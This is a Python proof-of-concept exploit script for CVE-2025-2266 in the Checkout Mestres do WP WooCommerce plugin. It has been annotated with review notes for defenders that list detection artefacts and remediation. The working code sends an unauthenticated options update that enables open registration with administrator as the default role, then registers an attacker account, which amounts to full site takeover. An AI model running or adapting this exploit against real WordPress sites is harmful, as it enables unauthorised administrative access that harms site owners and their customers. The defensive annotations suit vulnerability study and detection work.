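# -*- coding: utf-8 -*-
"""Proof-of-concept for CVE-2025-2266 (Checkout Mestres do WP for WooCommerce).

What the code below does, in order:

1. GETs the plugin's ``readme.txt`` and looks for two specific "Stable tag"
   strings (8.6.5 and 8.7.5).
2. POSTs ``action=cwmpUpdateOptions`` to ``/wp-admin/admin-ajax.php`` without
   any authentication, asking the site to set ``users_can_register=1`` and
   ``default_role=administrator``.
3. Optionally submits the standard WordPress registration form, so the new
   account inherits that default role.

Review notes for defenders:

* Step 2 is a persistent configuration change and the script never reverts
  it. While both options stay set, any visitor who registers becomes an
  administrator, so after a test both options must be restored and the
  administrator list audited.
* Observable artefacts: a request for the plugin ``readme.txt`` followed by an
  unauthenticated POST to ``admin-ajax.php`` carrying
  ``action=cwmpUpdateOptions``; changes to the ``users_can_register`` and
  ``default_role`` options; a POST to ``wp-login.php?action=register``; new
  administrator accounts. The User-Agent is a fixed browser string and is not
  a dependable indicator.
* Remediation is to update the plugin to a release that fixes CVE-2025-2266
  (the fixed version is not stated in this file).
"""
import requests
import argparse
import time

# Exploit By : Nxploited | Khaled Alenazi,

# NOTE(review): this silences urllib3's warnings, including the one raised for
# unverified HTTPS requests (see session.verify in prepare_session).
requests.packages.urllib3.disable_warnings()

# Upper bound, in seconds, for every HTTP request. The original only bounded
# the readme GET, so either POST could block indefinitely on a stalled host.
REQUEST_TIMEOUT = 10


def parse_arguments():
    """Parse the command line.

    Returns:
        argparse.Namespace with ``url`` (required), ``newuser`` (``None`` when
        the flag is absent, ``"nxploited"`` when given without a value) and
        ``email`` (defaults to ``"nxploitbot@gmail.com"``).
    """
    parser = argparse.ArgumentParser(
        description="CVE-2025-2266 Checkout Mestres do WP for WooCommerce Plugin Exploit By : Nxploited | Khaled Alenazi,"
    )
    parser.add_argument(
        "-u",
        "--url",
        required=True,
        help="Target WordPress site URL (e.g., http://example.com/wordpress)",
    )
    parser.add_argument(
        "-newuser",
        nargs='?',
        const="nxploited",
        help="Create new admin user (default username: nxploited)",
    )
    parser.add_argument(
        "-email",
        nargs='?',
        const="nxploitbot@gmail.com",
        default="nxploitbot@gmail.com",
        help="Email for new user (default: nxploitbot@gmail.com)",
    )
    return parser.parse_args()


def prepare_session():
    """Build the shared ``requests.Session`` used for every request.

    Returns:
        A session with certificate verification disabled and a fixed desktop
        browser User-Agent header.
    """
    session = requests.Session()
    # NOTE(review): certificate validation is off, so responses (including the
    # readme used for the version check) are not authenticated and can be
    # altered by anyone on the network path.
    session.verify = False
    session.headers.update({
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
    })
    return session


def get_urls(base_url):
    """Derive the three endpoint URLs from the site base URL.

    Args:
        base_url: Site root without a trailing slash (``main`` strips it).

    Returns:
        Tuple ``(ajax_url, register_url, readme_url)``.
    """
    ajax_url = f"{base_url}/wp-admin/admin-ajax.php"
    register_url = f"{base_url}/wp-login.php?action=register"
    readme_url = f"{base_url}/wp-content/plugins/checkout-mestres-wp/readme.txt"
    return ajax_url, register_url, readme_url


def check_plugin_vulnerability(session, readme_url):
    """Check the plugin readme for one of the two version strings tested here.

    The match is a plain substring test on the readme body; a missing, stale
    or edited readme gives no information about the installed code.

    Args:
        session: Session from ``prepare_session``.
        readme_url: URL of the plugin's ``readme.txt``.

    Returns:
        ``True`` only when the readme was fetched and contains
        ``Stable tag: 8.6.5`` or ``Stable tag: 8.7.5``; ``False`` otherwise,
        including when the readme cannot be fetched.
    """
    try:
        response = session.get(readme_url, timeout=REQUEST_TIMEOUT)
    except requests.RequestException as e:
        # Fail closed: the original returned True here, which sent the
        # option-changing POST to hosts whose plugin version (or even the
        # plugin's presence) was never confirmed.
        print(f"[!] Could not read readme.txt: {e}")
        print("[-] Plugin version not confirmed; no further requests will be sent.")
        return False

    if "Stable tag: 8.6.5" in response.text or "Stable tag: 8.7.5" in response.text:
        print("[+] Target is vulnerable! Exploiting now...")
        time.sleep(3)
        return True

    print("[-] Plugin version is not vulnerable.")
    return False


def enable_registration(session, ajax_url):
    """Send the unauthenticated options update to ``admin-ajax.php``.

    The request asks the site to enable open registration and to make
    ``administrator`` the default role. Nothing in this script restores the
    previous values.

    Args:
        session: Session from ``prepare_session``.
        ajax_url: URL of ``/wp-admin/admin-ajax.php``.

    Returns:
        ``True`` when the response body contains ``"sucesso"``
        (case-insensitive) -- presumably the plugin's success marker; this
        does not confirm which options were actually written.
    """
    payload = {
        "action": "cwmpUpdateOptions",
        "data": "users_can_register=1&default_role=administrator"
    }
    response = session.post(ajax_url, data=payload, timeout=REQUEST_TIMEOUT)
    print(f"[DEBUG] Response from exploit: {response.text.strip()}")
    return "sucesso" in response.text.lower()


def register_new_user(session, register_url, username, email, base_url):
    """Submit the WordPress registration form and print the outcome.

    Args:
        session: Session from ``prepare_session``.
        register_url: URL of ``wp-login.php?action=register``.
        username: Login name to request.
        email: Address WordPress will associate with the account.
        base_url: Site root, used only in the printed login hint.
    """
    payload = {
        "user_login": username,
        "user_email": email
    }
    response = session.post(register_url, data=payload, timeout=REQUEST_TIMEOUT)
    print(f"[DEBUG] Response from registration: {response.text.strip()}")
    # NOTE(review): this condition is true for any HTTP 200 and for any page
    # that merely contains the word "username", so the "registered
    # successfully" line is not evidence that an account exists. Confirm
    # against the site's user list.
    if "username" in response.text.lower() or response.status_code == 200:
        print(f"[+] Step 2: User '{username}' registered successfully.")
        print(f"[!] Login at: {base_url}/wp-login.php")
        print(f"[!] Username: {username}")
        print(f"[!] Email: {email}")
        print("[!] Set password manually from admin panel or reset link.\n")
    else:
        print("[!] Registration sent, but check manually if user was created.")


def main():
    """Run the version check, the options update and the optional signup."""
    args = parse_arguments()
    base_url = args.url.rstrip("/")
    username = args.newuser if args.newuser else None
    email = args.email

    session = prepare_session()
    ajax_url, register_url, readme_url = get_urls(base_url)

    print("====================================")
    print(" CVE-2025-2266 Exploit Tool ")
    print(" Author: Nxploited | Khaled Alenazi")
    print("====================================\n")

    if check_plugin_vulnerability(session, readme_url):
        # The options update is sent even when -newuser was not given; in that
        # case the site is left with open registration and an administrator
        # default role and no account is created by this run.
        if enable_registration(session, ajax_url):
            if username:
                register_new_user(session, register_url, username, email, base_url)
        else:
            print("[-] Exploit failed — target may not be vulnerable.")
    else:
        print("[-] Target does not appear vulnerable.")

    print("\n[✓] Exploit By Nxploited | Khaled Alenazi")


if __name__ == "__main__":
    main()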